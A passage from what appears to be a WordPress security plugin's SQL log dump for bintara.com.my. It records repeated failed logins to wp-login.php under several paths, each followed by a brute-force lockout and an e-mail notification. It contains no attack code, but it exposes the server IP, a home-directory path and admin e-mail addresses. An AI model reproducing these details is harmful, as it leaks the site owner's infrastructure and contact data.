Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYjmnkXpgmG5P@iB8kxHwAAAIU\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"54.191.160.201\";s:11:\"REMOTE_PORT\";s:5:\"37646\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYjmnkXpgmG5P@iB8kxHwAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072027.0571\";s:12:\"REQUEST_TIME\";s:10:\"1569072027\";}}','notice','2019-09-21 13:20:28','2019-09-21 13:20:27',17795888,19285904,'https://bintara.com.my/wp/wp-login.php',1,0,'54.191.160.201'),(25872,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:20:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:20:27\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:35:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:35:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:20:28','2019-09-21 13:20:27',17880728,19285904,'https://bintara.com.my/wp/wp-login.php',1,0,'54.191.160.201'),(25873,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:20:28','2019-09-21 13:20:27',18086464,19285904,'https://bintara.com.my/wp/wp-login.php',1,0,'54.191.160.201'),(25874,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYjyLfBTP0kPOVnb8juRgAAAEE\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"37.59.14.72\";s:11:\"REMOTE_PORT\";s:5:\"35700\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYjyLfBTP0kPOVnb8juRgAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072072.8408\";s:12:\"REQUEST_TIME\";s:10:\"1569072072\";}}','notice','2019-09-21 13:21:14','2019-09-21 13:21:13',17804464,19288704,'https://bintara.com.my/test/wp-login.php',1,0,'37.59.14.72'),(25875,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:21:13\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:21:13\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:36:13\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:36:13\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:21:14','2019-09-21 13:21:13',17888536,19288704,'https://bintara.com.my/test/wp-login.php',1,0,'37.59.14.72'),(25876,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:21:14','2019-09-21 13:21:13',18094648,19288704,'https://bintara.com.my/test/wp-login.php',1,0,'37.59.14.72'),(25877,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYjyzDrcQxTmGrCWuaRCAAAAc0\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.137.124\";s:11:\"REMOTE_PORT\";s:5:\"40934\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYjyzDrcQxTmGrCWuaRCAAAAc0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072075.7302\";s:12:\"REQUEST_TIME\";s:10:\"1569072075\";}}','notice','2019-09-21 13:21:16','2019-09-21 13:21:16',17804704,19290464,'https://bintara.com.my/2019/wp-login.php',1,0,'167.71.137.124'),(25878,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:21:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:21:16\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:36:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:36:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:21:16','2019-09-21 13:21:16',17889464,19290464,'https://bintara.com.my/2019/wp-login.php',1,0,'167.71.137.124'),(25879,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:21:16','2019-09-21 13:21:16',18095584,19290464,'https://bintara.com.my/2019/wp-login.php',1,0,'167.71.137.124'),(25880,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYj-nkXpgmG5P@iB8kxTwAAAJE\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"192.95.30.27\";s:11:\"REMOTE_PORT\";s:5:\"47098\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYj-nkXpgmG5P@iB8kxTwAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072126.4092\";s:12:\"REQUEST_TIME\";s:10:\"1569072126\";}}','notice','2019-09-21 13:22:07','2019-09-21 13:22:06',17797704,19283632,'https://bintara.com.my/wp/wp-login.php',1,0,'192.95.30.27'),(25881,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:22:06\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:22:06\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:37:06\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:37:06\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:22:07','2019-09-21 13:22:06',17881616,19283632,'https://bintara.com.my/wp/wp-login.php',1,0,'192.95.30.27'),(25882,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:22:07','2019-09-21 13:22:06',18087624,19283632,'https://bintara.com.my/wp/wp-login.php',1,0,'192.95.30.27'),(25883,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkHViJ7D9Gn7wDPh8hBAAAAMY\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"146.255.101.216\";s:11:\"REMOTE_PORT\";s:5:\"52840\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkHViJ7D9Gn7wDPh8hBAAAAMY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072157.7306\";s:12:\"REQUEST_TIME\";s:10:\"1569072157\";}}','notice','2019-09-21 13:22:39','2019-09-21 13:22:38',17799328,19288752,'https://bintara.com.my/test/wp-login.php',1,0,'146.255.101.216'),(25884,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:22:38\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:22:38\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:37:38\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:37:38\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:22:39','2019-09-21 13:22:38',17884080,19288752,'https://bintara.com.my/test/wp-login.php',1,0,'146.255.101.216'),(25885,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:22:39','2019-09-21 13:22:38',18090576,19288752,'https://bintara.com.my/test/wp-login.php',1,0,'146.255.101.216'),(25886,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYkObfBTP0kPOVnb8juTQAAAFg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"108.169.181.185\";s:11:\"REMOTE_PORT\";s:5:\"40464\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYkObfBTP0kPOVnb8juTQAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072185.5892\";s:12:\"REQUEST_TIME\";s:10:\"1569072185\";}}','notice','2019-09-21 13:23:06','2019-09-21 13:23:05',17798632,19284000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.169.181.185'),(25887,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:23:05\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:23:05\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:38:05\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:38:05\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:23:06','2019-09-21 13:23:05',17883128,19284000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.169.181.185'),(25888,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:23:06','2019-09-21 13:23:05',18088728,19284000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'108.169.181.185'),(25889,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 